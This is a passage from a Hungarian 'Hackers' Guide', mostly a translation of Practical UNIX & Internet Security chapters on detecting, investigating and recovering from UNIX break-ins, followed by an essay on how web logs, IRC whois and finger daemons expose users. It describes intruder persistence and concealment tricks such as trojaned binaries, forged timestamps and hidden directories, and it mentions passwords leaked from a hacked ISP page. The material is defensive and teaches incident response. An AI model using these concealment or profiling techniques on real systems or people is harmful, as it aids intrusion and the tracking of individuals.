éppúgy,mint a /bin és /etc könyvtárakról.Amint a .tar file elkészült,átmásolta azt egy másik computerre,majd megállította a rendszert. Másnap reggel a következõ megfigyeléseket tette a .tar fileban:
148
Hackers’ Guide
- Valaki betört a rendszerbe - A /bin/login program módosítva lett,így bárki be tud lépni rootként az Internetrõl,egy spéci password birtokában. - A /var/.e/vs program amit a támadó futtatott,egy sniffer volt,ami passwordokre vadászott.Ez az elfogott passwordoket egy másik gépre küldte át az interneten keresztül - A /bin/ls és /bin/ps programok stzintén módosítva lettek,így azok nem jelenítették meg a /var/.e directoryt - Az inode kreációs dátum és a módosítási idõk a /bin/ls,/bin/ps és /bin/login file-okon vissza lettek állítva az eredeti értékekre(a módosítás elõttire).A módosított file-ok chechksumja pedig megegyeztek az eredetivel.De a file-ok összehasonlítása a bckupban tároltakkal megmutatja,hogy változtatás történt rajtuk. Este 10:00 volt,amikor a betörést felfedezte.Ennek ellenére felhívta telefonon a system managert az otthonában.Ekkor rá kellet jönnie.... - A system manager tudott a betörésrõl 3 napja,de semmit sem tett az ügy érdekében.Az ok az volt,hogy félt,hogy a behatoló sok biztonsági rést csinált rendszerének védelmében,és ha felidegesíti õt,az illetõ bosszút állhat és letörölhet fontos file-okat,vagy teljesen lelõheti a rendszert. :)) [Ez aztán a system manager,mi? :)] Ez egy nagyon hülye lépés volt.Hagyni a támadót,hogy a rendszeren maradva minél több passwordot gyüjthessen....Bahhh! A késleltetéssel hagyjuk,hogy az idõ a támadónak dolgozzon,és egyre nagyobb módosításokat eszközöljön a rendszeren. Mit tehetett volna a manager,amint felfedezi a betörést? Nos...nagyjából az,amit a konzultáns barátunk tett...Csinálni egy archive-ot a rendszerrõl szalagra,vagy egy másik diskre,izolálni a rendszert,és csak ezután nyomozni.Ha a rendszer boobytrappolva lett,és egy áramellátás-hiba keletkezik,abszolút mindent elveszthetnek. A fenti eset egy tipikus példa az 1994-1995-ben történt betörésekre.A támadonak elérése van sok eszközhöz,amikkel a betörést végre lehet hajtani(password snifferek,fake system commandok,amelyek elrejtik jelenlétét).Ezen eszközök használóinak nagy része azt sem tudja hogyan mûködnek.Sok történetet hallani,hogy egy lamernek sikerül betörni egy gépbe egy ilyen eszközzel,aztán a UNIX-os rendszeren DOS-parancsokat akarnak kiadni...Röhejes! Eredeti mû : Practical UNIX & Internet Security Fordította : Th3NmY
************************************************************************************************
149
Hackers’ Guide
Betörések felfedezése és kezelése III.
A Log Fileok : A behatoló álltal hagyott nyomok felfedése Ha nem sikerül a behatolót elkapnod aktivítás közben,még mindig jó esélyed van a nyomok megtalálására a system logokon keresztül. Elékezz! Keress szokatlan,furcsa tevékenységeket.pl : - Userek furcsa idõpontban belépve - Megmagyarázhatatlan rebootok. - Megmagyarázhatatlan változtatások a system clock-on. - Szokatlan hibaüzenetek a mailertõl,ftpd-tõl,vagy más network servertõl. - Hibás belépési próbálkozások rossz jelszavakkal - A su parancs jogosulatlan vagy gyanús használata - Felhasználók,amelyek ismeretlen siteokról vannak loginolva a hálózaton. Másfelõl nézve azonban ha a behatoló elég ügyes és eléri a superuseri jogosultságokat,eltûntetheti az invázió összes bizonyítékát.Egyszerûen azért,mert ha a rendszered logjában nincs record a támadás nyomairól,nem fogsz tudni rájönni,hogy a rendszered támadás alatt áll. Sok támadó kis trükköket használ : ahelyett,hogy óvatosan kiszedegetné a rá utaló recordokat a logokból,egyszerûen törli,vagy meghamisítja az egész filet.Ez azt jelenti,hogy ha felfedezed,hogy egy logfile törölve van,vagy hamis információt tartalmaz,fennáll a lehetõség,hogy betörtek a rendszerünkre.De nem biztos,hogy egy betörés a felelõs a furcsaságokért.Hiányzó,vagy hamis logok azt is jelenthetik,hogy a system adminisztrátorok egyike óvatlan volt;lehetnek olyan programok a rendszeren,amelyek törlik a logokat rendszeres idõközönként. Arról is felismerhetünk egy támadást,ha jogosulatlan változtatásokat találunk rendszerprogramokban,vagy egy user file-jaiban.Ez egy másik jó ok,hogy olyan programokat használj,mint a Tripwire a fileokban történõ változások monitorozására. Ha a system logok egy hardcopy terminal-ra,vagy másik gépre vannak irányítva,biztosan szeretnéd elõször ezeket megvizsgálni,mert tudod,hogy ezeket nem tudta a támadó módosítani,aki telefonvonalon,vagy networkon keresztül loginolt. Eredeti mû : Practical UNIX & Internet Security Fordította : Th3NmY
************************************************************************************************
150
Hackers’ Guide
Betörések felfedezése és kezelése IV.
A behatoló utáni takarítás Ha a támadónak sikerült megszereznie a superuseri jogokat,vagy elérést más privilegizált accountokhoz úgymint uucp,módosíthatja a rendszert,hogy könnyû legyen újra visszajönnie a jövõben.Részletesebben,a támadó : - Készíthet egy új accountot - Megváltoztatja a jelszót egy létezõ accounthoz - Megváltoztatja a védelmeket egyes file-okon vagy device-okon - SUID vagy SGID programokat csinálhat - Kicserélheti,vagy letörölheti a system parancsokat - Installál egy spéci aliast a mail rendszerben hogy egy programot futtasson - Új arculatot ad a news vagy UUCP rendszerhez - Installál egy password sniffert - Ellopja a password file-t a késõbbi crack-hez Ha a behatoló az urolsó két bûntettet elkövette,valószínüleg már van elérése egy legitim accounthoz,bármikor visszatérhet a rendszerbe.Meg kell változtatnod az összes passwordot a rendszeren. Egy sikeres betörés után,egy nagyon körültekintõ auditot kell végrehajtanod,hogy felmérd az okozott kár volumenét.A betörés természetétõl függõen,meg kell vizsgálnod az egész rendszert.Ugyanígy meg kell vizsgálnod más gépeket is a local networkodon,vagy talán az egész networkot(beleértve a routereket,és más hálózati eszközöket). Megjegyezném,hogy a COPS és a Tiger nagy segítséget nyújtanak a helyreállítási munkálatokban mivel automatikusan leellenõrzik azokat a dolgokat amiket ebben a fejezetben tárgyalunk majd.Emlékezz,lehet,hogy ezek is kompromittálva lettek,ezért szerezz egy új másolatot,és arról dolgozz.A COPS és a Tiger feltételezi a systemexecutable -ek integrítását,úgymint ls és find.Mi úgy gondoljuk ,ezek az eszközök jobban használhatók adott esetekben integritás checkerekkel,mint a Tripwire. A fejezet hátralévõ része részletesen tárgyalja,hogyan találjuk meg,hogy egy támadó mit csinálhatott,és hogyan fogod mindezt rendbehozni. Új accountok Egy behatolás után,scanneld a /etc/passwd file-t,nézd meg,vannak-e benne új accok.Ha csináltál másolatot errõl a fileról,használd a diff parancsot,hogy a két file-t összehasonlítsd.De ne tévesszen meg,ha semmilyen különbséget nem 151
Hackers’ Guide
találsz...vizuáld le saját magad is,mert lehet,hogy a támadó módosította a diff programot...ha így sem találtál semmit,az sem jelent semmit....lehet,hogy a betörõ a másolatot is módosította. (Ez egy jó ok arra,hogy mindig tartsunk egy külön floppyn másolatot a /etc/passwd file-ról) Törölj minden accot,amit a betörõ hozott létre.Jó ha leírod papírra az acc-recordot mielõtt letörölnéd,abban az esetben ha szeretnéd beperelni a támadót. Légy biztos benne,hogy a /etc/passwd minden sorát leellenõrizted a megfelelõ formátumban,és nem volt UID vagy password mezõ,ami jogosulatlan értékekre lett megváltoztatva.Emlékezz,hogy egy extra kettõspont (:) hozzáadása a /etc/passwd root bejegyzéshez ugyanazt a kárt okozza,mintha a superuser egész passwordját törölnék! A következõ awk parancs kiírja azokat a /etc/passwd bejegyzéseket,amelyeknek nincs meg a hét mezõjük,amely a superusert specifikálja,vagy nincs passwordjuk. # cat-passwd | awk -F: 'NF != 7 || $3 == 0 || $2 == "" { print $1 " " $2 " " $3}' root xq7Xm0Tv 0 johnson f3V6Wv/u 0 sidney 104 # Ez az awk parancs beállítja a mezõ szeparátort kettõspontra (:), amelyik megegyezik a /etc/passwd formátumával.Az awk parancs ekkor kiírja az elsõ 3 mezõt(username, password, és UID) minden sorból,aminek nincs meg a 7 mezõje,vagy 0 az UID,or nincs passwordje. Ebben a példában a Johnson usernek 0-ra lett változtatva volt a UID-je,ezzel az accountja superuseri alias lett,és a Sidney nevû usernek a passwordja el lett távolítva. Ez az automatizált checkelés sokkal megbízhatóbb,mint a vizuális szemrevételezés,de bizonyosodj meg róla,hogy az a script,amit a checkeléshez használsz,nem lett-e módosítva a betörõ álltal.A legbiztosabb,ha az awk parancsot minden esetben begépeljük,és nem egy scriptben helyezzük el....vagy használd a Tripwire-t. A fileok tartalmának változása Egy behatoló,aki megszerezte a superuseri jogokat,bármilyen file-t megváltoztathat a rendszeren.Csinálhatsz egy átfogó leltárat a rendszer filerendszerérõl,vagy specifikusan kereshetsz bármilyen változtatást.Például egy intruder elhelyezhetett egy trap-doort,vagy logical bomb-ot,hogy azok késõbb károkat tudjanak okozni. Az egyik módszer,hogy könnyen észrevegyük a system programokban történt változtatásokat,hogy checklistákat használunk. Változtatások a file vagy directory védelmekben Egy betörés után meg kell vizsgálnunk a védelmét minden kritikus file-nak a rendszeren.Azok a behatolók,akik superuseri privilégiumokat szereztek megváltoztathatják a kritikus file-ok védelmét,könnyebbé téve ezzel a superuseri jogok újbóli megszerzését.Például ha egy intruder a /bin könyvtár mode-ját 777-re
152
Hackers’ Guide
változtatta meg,a jövõben könnyebb lesz módosítania a rendszert; vagy a /dev/kmem mode-ját átírva megteheti,hogy módosítja a system call-okat közvetlenül egy symbolic debuggert használva. Új SUID és SGID fileok Computer crackerek ,akik superuser jogokra tettek szert,gyakran készítenek SUID és SGID file-okat.Egy betörés után scanneld a rendszeredet,hogy megbizonyosodj afelõl, hogy nem keletkeztek új SUID file-ok. Változások a .rhosts fileban Egy támadó új .rhosts file-t gyárthatott a userek home directoryjában,vagy módosíthatta a már meglévõket. (A .rhosts file megengedi a többi usernek a hálón,hogy logineljenek az accountodra anélkül,hogy passwordot kérne).Egy betörés után mondd meg a usereknek, hogy checkeljék a .rhost file-jaikat,hogy megbizonyosodj arról,hogy egyikük sem lett módosítva. Változások a /etc/hosts.equiv fileban Egy betolakodó hozzáadhat extra hostokat a /etc/hosts.equiv filehoz,szóval bizonyosodj meg róla,hogy nem történtek változtatások benne.Ugyanakkor checkeld a /etc/netgroups file-t is,ha NIS-t vagy NFS-t futtatsz. Változások a startup fileokban Egy támadó módosíthatja a tartalmát a pont-tal (.) kezdõdõ fileoknak a userek home directoryjában.Utasítsd az összes usert,hogy ellenõrizzék ezeket a fileokat,és jellezzek minden változást.Azt is mondhatod még nekik,hogy úgy checkoljanak,hogy elõször nevezzék át õket login.old,cshrc.old illetve profile.old-ra. Vedd komolyan azoknak a fileoknak a verziószám-ellenõrzését,amelyeknek az ownere root,és ugyanígy checkeld a /etc/profile filet. Ha sendmailt használsz, a támadó kreálhatott vagy módosíthatta a .forward filet,így tudnak programokat futtatni,amikor egy mail érkezik.Ez a külsõség különösen kritikus a nonuser accountoknál,pl ftp vagy uucp. Ha tudod a támadó belépésének pontos idõpontját,ki tudod listázni az összes .-tal kezdõdõ filet a userek home directoryjában,rendezheted õket az utolsó változtatások idõpontja szerint,és ellenõrizheted õket,hogy lettek-e módosítva. Egy egyszerû shell script erre : #!/bin/ksh # Search for .files in home directories for user in $(cat-passwd | /bin/awk -F: "length($6) > 0 {print $6}") do for name in $user/.* do [[ $name == $user/.. ]] && continue [[ -f $name ]] && print "$name" done done | xargs ls -ltd
153
Hackers’ Guide
Ugyanakkor a timestampek vizsgálata nem detektál minden módosítást,ahogy azt majd a fejezet végére létni fogjuk.A -c és -l opciók az ls parancshoz használhatók arra,hogy az esetleges permission beállításokban történt változásokat is checkolni tudjuk,és meg tudjuk határozni,hogy az mtime-ot megváltoztatták-e,hogy elrejtsék a módosítást. Egy másik megközelítés,hogy az egész filerendszert átnézzük a find paranccsal és észleljük,milyen fileok és könyvtárak lettek elérve a betörés ideje környékén. Ez talán kiindulópontot jelenthet ahhoz,hogy mi is történhetett. Abban az esetben,ha a compilered,loadered, vagy libraryd mindegyike elérést mutat közel ugyanabban az idõpontban,levonhatod a konklúziót,hogy a betolakodó valamit fordított. Ha úgy döntessz,hogy így közelíted meg a dolgot, azt tanácsoljuk,hogy elõször mountold újra az egész filerendszert,mint read-only,így a vizsgálódásaid nem változtatják meg a mentett filerendszer dátumait és idejét. Rejtett file-ok és direcoryk A támadó csinálhatott egy vagy több rejtett directoryt a rendszeren,és használhatta ezt arra,hogy ide rejtse el az ellopott információt vagy az olyan programokat,amelyek megtörik a védelmet. Régebbi UNIX rendszereken, egy álltalános trükk volt a directory elrejtésére,hogy unlinkelték (rootként) a ".." directoryt egy alkönyvtárban, majd egy újat hoztak létre. A find parancs figyelmét az így elrejtett directoryk elkerülték,így ott nem tudott speciális file-ok után kutatni. A UNIXok modern verziói már detektálni tudják a hidden directorykat,amikor a /etc/fsck programot futtatjuk. Ezért mindig futtasd az fsck-t az összes filerendszeren a betörés után. Néhány HP-UX rendszeren a betolakodók az eszközeiket és file-jaikat egy CDF(Context Dependent File) directoryban tárolták. Ezeken a rendszereken a find és ls parancsoknál mindig használd a -h opciót,amikor a speciális file-okat keresed. Napjainkban,a betolakodók gyakran rejtik a filejaikat olyan directorykba,amelyeknek nevét nehéz felfedezni,vagy nehéz a command line-ba írni. Így egy kezdõ adminisztrátornak, aki felfedez egy rejtett directoryt, nyilvánvalóan nehezére esik majd a könyvtár tartalmához való hozzáférés. Az olyen filenevek, amelyeket nehéz felfedezni vagy megnyitni,álltalában tartalmazzák a ".. " (dot dot space) karaktersorozatot, kontroll karaketereket,backspace-eket,vagy más speciális karaktereket. Gyakran felfedezhetsz hidden diractorykat könnyen, mert ezek olyan eredményeket adnak vissza,amelyek különböznek a normál könyvtáraktól. Például : prose% ls -l drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar prose% cd foobar foobar: No such file or directory prose% Ebben az esetben a könyvtár valódi neve foobar , az r betût pedig egy space követi.A könnyû út az ilyen és ehhez hasonló nevek megnyitásához,hogy használjuk
154
Hackers’ Guide
a shell wildcard karaktereit. Pl a *ob* csak a foobar könyvtárral fog egyezni,és teljesen mindegy,hogy hány space,illetve egyéb dolog volt a végén. % ls -l total 1 -rw-r--r-- 1 john 21 Mar 10 23:38 bogus?file % echo * | cat -v bogus^Yfile % Ebben a példában a bogus?file egy CTRL+Y karaktert tartalmaz.Az ls parancs néhány verziója a controll karaktereket kérdõjelekként(?) írja ki. Ahhoz,hogy megtudjuk,mi volt a kontroll karakter,a nyers filenevet kell a cat parancsnak küldened. Ha a Korn shell 93-as verzióját használod,akkor kilistáztathatod egy adott local directory filejait egy olvashatóbb formában.Ez a megközelítés használható abban az esetben,ha az ls parancsodat kompromittálta a támadó : $ printf $'entry: %'' .* * entry: . entry: .. entry: $'..\n' entry: $'bogus\031file' entry: temp0001 entry: temp0002 $ Tulajdonos nélküli file-ok Néha a támadók olyan file-okat hagynak a filerendszerben,amelyeknek nincs ownerja,illetve groupja.Ez azért van,mert a file-hoz tartozó UID, illetve GID érték nem felel meg egyetlen bejegyzésnek sem a /etc/passwd illetve a /etc/group fileban. Ez olyankor fordulhat elõ,ha a támadó csinált egy accountot és néhány file-t,majd törölte az accot - és ott hagyta a file-okat. Vagy esetleg a támadó módosította a raw inode-okat egy lemezenmés megváltoztatta az UID-et. Ezekre a file-okra rákereshetsz a find paranccsal, ahogy a következõ példa is mutatja : # find / -nouser -o -nogroup -print Emlékezz,ha NFS-t használsz, futtathatod a következõ find parancsot az összes serverre : # find / \( -local -o -prune \) -nouser -o -nogroup -print Akkor is lehetnek owner nélküli fileok a rendszeren,ha egy accot töröltél,de a hozzá tartozó file-okat nem.Egy jó ötlet,hogy idõnként scanneljünk az ilyen file-ok után,ha találunk,mentsük õket szalagra,hátha késõbb még szükségünk lesz rá. Eredeti mû : Practical UNIX & Internet Security Fordította : Th3NmY
155
Hackers’ Guide
************************************************************************************************
Betörések felfedezése és kezelése V.
Egy példa Tegyük fel,hogy te egy system administrator vagy egy rendszeren és John Q. Random ott van veled az irodában. Hirtelen egy figyelmeztetõ ablak nyílik a képernyõn,amelyet egy Swatch rule syslog kimenet-monitorozó progi nyitott.A syslog üzenet azt mutatja,hogy John Q. Random loginelt,használta az su parancsot,és root lett. Ez a user egy támadó - egy támadó,aki root lett! Szerencsére,a terminálodon van egy superuser shell. Úgy döntessz,hogy a legjobb megoldás,ha a rendszeredet azonnal leállítod. Ahhoz,hogy ezt megtedd, a következõ parancsokat kell begépelned : # sync # /etc/init 0 Vagy esetleg az init processnek TERM szignált küldessz : # sync # kill -TERM 1 Ez az eljárás nem ajánlott a System V rendszereken,ellenben szükséges a BSD rendszereken. A döntés, hogy megállítsd a rendszert ,azon a tényen alapult lövésed sincs arról,hogy ki volt a betolakodó,mit csinált - és hogy superuserré vált.Miután a betolakodó superuser, nem tudod,hogy a rendszer mely elemeit módosította - ha módosította. Például a támadó lehet,hogy eltávolított system programokat, vagy megsemmisített logfile-okat. Úgy találod,hogy a legjobb út,ha shutdownolod a rendszert,és egy védett terminálhoz mész ahol biztosan nem járhatott a támadó,amíg próbáltad kitalálni,mi is történik. A következõ lépés, hogy kinyomtatod az összes szükséges logot - amit csak lehet(pl : konzol logok,network logok) -majd megpróbálod kitalálni,mit is csinálhatott a jogosulatlan betolakodó. Nézd meg,hogy történt-e valami szokatlan a rendszeren,miután beloginolt a támadó. Ezek a logok infokat adhatnak ,hogy a
156
Hackers’ Guide
támadó milyen programokat futtatott,és milyen mûveleteket,parancsokat hajtott végre. A mai logokkal ne zárd le a vizsgálatot! Ha a támadó most rootként van belépve, lehet, hogy korábban már volt accountja a gépre. Ha a logjaid egy napokkal ezelõttre is visszanyúlnak, vizsgáld át azokat is.Ha ezek backupolva vannak szalagokra, hozd vissza õket, majd vizsgáld át. Ha egy betörés után nyomozol - talán törvényes erõkkel karöltve - mindig csinálj egy backupot az egész rendszerrõl! Így lesz bizonyítékod a feltört rendszerrõl. Ha erre nincs lehetõséged, akkor a logokat mentsd el. Csinálj egy írott naplózást mindenrõl, amit csinálsz, vagy akarsz csinálni, és minden ilyen bejegyzéshez írd oda az idõpontot is! A következõ lépés kitalálni, hogyan jöhetett be a támadó, és megbizonyosodni róla, hogy többé ezt nem tudja megtenni. Vizsgáld át az egész rendszert! Ellenõrizd minden file permissionjait, és mode-ját! Keress új SUID vagy SGID programok után! Nézz bele esetleges az /etc/passwd file-ba esetleges módosítások után! Ha csináltál ellenõrzési listákat a programkönyvtáraidról, futtasd le õket,hogy változtatásokat keress! Emlékezz, hogy a betörõ nem biztos,hogy külsõ ember volt.A legtöbb ilyen incidenst az intézmény valamelyik belsõ embere okozta valamelyik user jelenlegi elérésével,vagy a sajátjával.Ha olyat tapasztalsz,hogy az aktivítás egy legitim usertõl jön, az még nem feltétlenül jelenti azt, hogy valóban a user a tettes. Lehet, hogy valaki feltörte a jelszót, és kívülrõl jött be,de lehetett belsõ ember is, aki feltörte egy másik user jelszavát. Csak miután végrehajtottad ezeket a lépéseket,és leellenõrizted ezeket az információkat,csak azután hozhatod vissza a rendszert. Soha ne higgy semminek,kivéve a hardcopyt Ha a rendszeredet kompromittálták,ne higgy semmilyen online információnak. Ha gyanús változásokat találsz a file-okban, ne higgy semminek, amit a rendszered mond neked, mert egy jó system cracker bármit megváltoztathat a gépeden. Ez furcsának tûnhet, de jobb ha talán egy kis extra idõt töltünk a fileok visszaállításával,és a detektívesdivel, mintha az esemény mégegyszer lejátszódhatna a jövõben, és a támadó újra bejöhetne. Emlékezz, egy támadó, akinek sikerül szert tennie a superuseri jogokra, bármit megtehet a rendszereden, gyakorlatilag bármilyen byteot megváltoztathat a disken. A támadó bármilyen system programot át tud írni,le tud fordítani,ki tud cserélni másikra,így a standard eszközeid nem fogják elárulni jelenlétét. A támadó patchelheti a kernelt, amelyen a gépünk futtat, kikapcsolhatja a security opcióit amelyeket te elõzõleg bekapcsoltál. A támadó bármikor megnyithatja a raw disk device-okat olvasásra és írásra.Alapvetõen, a támadó aki megszerzi a superuseri jogosultságokat, a kedvére játszadozhat a rendszereddel - ha van elég ideje, motivációja és tudása. Gyakran nincs szükségük kiemelkedõ képességekre. Ehelyett különbözõ, publikusan elérhetõ eszközöket használnak a behatoláshoz. Például tegyük fel, hogy egy fileban módosítást vélsz felfedezni és kiadod az ls -l vagy ls -la parancsot. Az utolsó módosítás ideje, amit a parancs kiírt a fájlra, nem 157
Hackers’ Guide
biztos, hogy valódi. Legalább négy módszer van egy támadónak,hogy hogyan módosítsa az idõt,amelyet ez a parancs adott vissza. Ezek mindegyikét a jelenlegi rendszertámadások során is szokták alkalmazni : - A támadó írhat egy programot, amely megváltoztatja a file-módosítás idejét az utimes() rendszerhívást használva. - A támadó átírhatja a rendszeridõt és dátumot a date paranccsal. A támadó módosítja a file-okat,végül visszaállítja az idõt és dátumot. Ennek a technikának az az elõnye a támadó szemszögébõl, hogy az inode elérés, és a kreációs idõ is beállítódik. - A támadó írhat a raw disk-re, megváltoztatva bármilyen tárolt idõpont értékét. - A támadó átírhatja az ls parancsot, hogy ne mutassa meg a kérdéses file(ok) valós módosítási idõpontját. A superuseri jogot szerzett támadó egyetlen limitje, hogy semmi olyat nem tud megváltoztatni, ami ki van nyomtatva egy printeren,vagy hardcopy terminálra(hardcopy rulzz! :). Ezért jó, ha van egy naplózó facilityd, ami mindig logolja, amikor a rendszeridõ ill. dátum megváltozik, és a logot hardcopy terminálra, vagy egy másik gépre másolja. Ebbõl kiindulva ajánljuk, hogy legyen kéznél jelenlegi oprendszered bootolható floppyja, hogy amikor szükséges, be tudj bootolni a floppyról, és a rendszeredet nem módosított eszközökkel tudd átvizsgálni. Ezt párosítva egy adatbázis kivonattal a módosítatlan file-okról (olyan,mint amit például a Tripwire csinál), könnyen megtalálhatod azokat a file--okat,amelyek módosítva lettek. Eredeti mû : Practical UNIX & Internet Security Fordította : Th3NmY
************************************************************************************************
Betörések felfedezése és kezelése VI.
A rendszer visszaállítása A következõ lépés a betörés kezelésében,hogy visszahozzuk a rendszert mûködõ állapotba.Az, hogy milyen gyorsan kell visszaállítanod a rendszert illetve hogy mit szándékozol tenni a betöréssel kapcsolatban, fogja eldönteni, hogy mikor, és hogyan csináld ezt a lépést. Íme néhány tipp, nagy vonalakban :
158
Hackers’ Guide
- Nyomozz addig, amíg ki nem derítetted, hogyan történhetett a betörés. Zárd le a sechole-okat, majd állítsd vissza a rendszert müxödõ állapotba. - Egyszerûen foltozd és javítsd ki azokat a dolgokat, amelyek kapcsolatba hozhatók a betöréssel. Ezután állítsd vissza a rendszert, de folyamatosan monitorozz mindent. - Csinálj egy gyors scan-t és tisztítást, majd állítsd vissza a rendszert. - Hívj törvényes végrehajtót, mielõtt bármit is csinálnál, és majd õk nyomozást indítanak. - Ne csinálj semmit. Ha úgy gondolod, kijavítassz minden rést,amely a támadót beengedhette és visszaállítassz minden sérült file-t a rendszeren,nem árt ,ha vannak jó backupjaid a rendszerrõl,így egyszerûbben visszahozható a mûködési állapot. Néha elég nehéz feladat kideríteni, hogy hogyan tudott bejutni a támadó, mert a logok álltalában nem tartalmaznak elég információt arról,hogy egész pontosan mi is történhetett. Sok eszköz létezik arra az esetre is, ha esetleg reverse-engineering -et akarunk csinálni. A legtöbb behatolás egy már kompromittált user password, vagy egy bug eredményei. Ha ebben az esetben ez egy bug volt, nehéz kideríteni mi is volt az postosan, pláne ha ez egy új bug volt,ami még nem volt széles körben exploitolva. Ha system software exploit gyanú áll fenn, megpróbálhatsz kapcsolatba lépni a gyártóval, hátha tudnak segíteni. A legtöbb esetben ez segít, ha karbantartási szerzõdésed van, vagy fõvásárló vagy. Végsõ esetben megpróbálhatsz az Useneten a security groupokban,illetve a jelenlegi WWW site -okon vagy levelezõlistákon szétnézni. Gyakran lehet itt találni a különbözõ rendszerek sebezhetõségérõl információkat. Eredeti mû : Practical UNIX & Internet Security Fordította : Th3NmY
************************************************************************************************
Anonimitás
Névtelenség - ...avagy "Mindenki minket figyel!" Sokan azt hiszik, hogy az interneten teljes névtelenség és szabadság van... Pedig ez koránt sincs így... A másik, hogy az ember nem mondhat semmit meggondolatlanul,
159
Hackers’ Guide
mert a nagy testvér pillanatok alatt a .log fájlokból lenyomoz minket, aztán lehet magyarázni neki a dolgot :))) Szóval megpróbálom a saját szemszögemből leírni az egészet, amit tudok, amire érdemes odafigyelni... Főleg azért, hogy az embert ne nyomják el teljesen és hogy személyisége kellő képpen kibontakozhasson az interneten... Amennyiben bővebb információra lenne szükséged vagy valamit nem értesz, ötleted vagy tanácsod van, kérlek oszd meg velem azt e-mail formájában, illetve ha ráérsz, akkor látogass el a Hackers' Faq és a FCF és a Dodge Viper Hacker Club oldalára.
Egyáltalán beszélhetünk-e névtelenségről az interneten? Sokan abban a tévhitben élnek, hogy abszolút-e névtelenek az interneten és szinte mindent megtehetnek, amit a valós világban nem... Úgy érzik, hogy teljes szabadság van a vírtuális valóságban... pedig :). Manapság számomra kicsit úgytűnik a dolog, hogy az anarchizmus legkisebb jelei sem mutatkoznak a neten, kivéve pár kivételtől... Most néhány példával szeretnem elvenni azok kedvét, akik még a függetlenség, szabadság és az abszolút anarchia ábrándjaiban élnek: 1.) Vegyük elősször is elrettentő példáknak a honlapokat... Amiket ugyebár a világhálóra kötött webszerverekről töltünk le. Ez az egész úgy megy, hogy a géped a böngészőprogramodon keresztül letölti a webszerverről a fájlokat... ez a webszerver viszont van olyan kedves, és egy rakás információt meghatározott .log kiterjesztésű fájlokba elment... hátha jó lesz még valamikor :) A .log fájlok segítségével a webszerver üzemeltetője rengeteg információhoz jut veled kapcsolatban... És mint azt tudjuk, ha megvan a te valódi IP-t, akkor bizony megfogtak ;) például, (de csak a rend kedvéért) az alábbi infót szerzhetik meg : - IP címed - HOST neved - Melyik kontinensről, melyik országból illetve városból kapcsolódsz rá a világhálóra - Webböngésző programod nevét és típusát - Operációs rendszered típusát - Monitorod felbontását és színmélységét - Az előző URL címet, ahol éppen browsereddel jártál - Internet szolgáltatód nevét És persze ez csak néhány "kedvcsináló" a sok ezerből... Ezeket az adatokat persze a webszervernek önmagában nem dolga eltárolni, de különböző scriptek segítségével a kliensről a kapcsolat közben lekérdezheti és általában kérdezi :(
2.) Folytassuk a sort az IRC-el... Ugye te is szoktál IRC-elni? Neked is van kedvenc csatornád? Tehát tételezzük fel, hogy éppen ebben a pillanatban fent vagy az egyik csatornán és esetleg vársz valakire. Valakivel elkezdesz beszélgetni és az illetőnek több infóra lenne szüksége veled kapcsolatban... Nem kell semmit tennie... Elég beírni a Státuszba, hogy "/whois TeBeceneved" és máris egy rakás infóhoz jut veled kapcsolatban... Itt van néhány:
160
Hackers’ Guide
- Megtudhatja a valódi nevedet - E-mail címedet - IP címedet - HOST nevedet - Internetszolgáltatód nevét - Kontinens, ország, város nevét, ahonnan te IRC-elszg ..stb. stb. Emellett persze ott vannak az online játékok, amelyek mellett néha lehet IRC-elni web alapon... Ott is pillanatok alatt rájöhetnek az IP címedre aztán kiegyenlítik a hátrányukat ;) Persze a fairplay a legfontosabb :))) 3.) Tételezzük fel, hogy az én nevem Kisbuci Illés és az e-mail címem [email protected]. Ez az egyik legáltalánosabb... vagyis, hogy a helyi internetszolgáltatók (ISP - Internet Service Provider) a felhasználónév választásnál a leendő ügyfeleknek azt ajánlják, hogy a teljes veztéknevükből és a keresztnevük első betűjéből álló felhasználónevet válasszák természetesen ékezet nélkül... A cégeknél is hasonló a választás, ha éppen az egyik ISP-nél fizetnek elő internet illetve e-mail szolgáltatásra... Vegyük példának az Elender feltört oldalán található jelszavakat és felhasználóneveket... A cégek általában teljes nevüket adják meg felhasználónévnek illetve a névhez még hozzátoldják a vállalati formát (pl. [email protected], [email protected], [email protected] stb.) Persze ez nem örökérvényű kijelentés... vannak eltérő esetek is... amikor magánszemély az internetes nickjét választja azonosítónak... Ez persze főleg a fiatalabb korosztálynál jellemző... Sok internetszolgáltató hozzáférést biztosít könyvtáraihoz. Ahhoz, hogy valakiről megtudjunk információkat illetve, hogy beazonosíthassuk e-mail címét, nem kell többet tenni, mint ellátogatni böngészőprogramunkal a http://www.whowhere.com URL cím alá... Itt be kell pötyögni az illető vezeték illetve/vagy keresztnevét és lehetséges mail szerverének domainjét... És láss csodát... Megvan a keresett személy... Ha nem szeretnéd, hogy ilyen módon szerezzenek rólad tudomást, ajánlatos ellátogatni az oldalra és ott felvenni a kapcsolatot a whowhere.com munkatársaival... 4.) Finger daemonokról csak úgy :)... Gondolom nem sokat hallottál róla? Nem kötötték az orrodra, amikor előfizettél az ISP-nél? :) Jó, mondjuk Magyarországon nagyon nem is kell, hogy az orrodra kössék, ugyanis tudomásom szerint csak egy szolgáltató futtat finger daemont... ha jól emlészem az Interware, és ott is csak annyit tudhatsz meg, hogy éppen milyen azonosítók vannak fent a neten... De külföldön egyes ISP-knél sokkal többet is... Ezek a daemonok olyan speciális programok, amelyek egy különleges, elkülönített porton/portokon várják a beérkező kapcsolatokat... A finger daemon a 79-es porton található meg... Tételezzük fel, hogy a fentebb említett Kisbuci Illés e-mail címe: [email protected] ... Kisbuciról csak ennyit tudunk... Tehát az azonosítóját és internetszolgáltatójának nevét/domainjét... Tehát látogassunk el az internetszolgáltatóhoz a 79-es porton... Remélhetőleg van finger daemonjuk... Gépeljük be most, hogy kisbucii és láss csodát :)... Persze mégegyszer szeretném hangsúlyozni, hogy magyarországon csak egy szolgáltatónál van ilyen... Külfödön is elég ritkák... de azért előfordulnak... Egyes esetekben a finger daemonok az alábbi információval szolgálnak ügyfeleikről: - Az azonosító mögé bújt személy valódi nevéről - Mikor voltak az azonosítóval fent utoljára
161
Hackers’ Guide
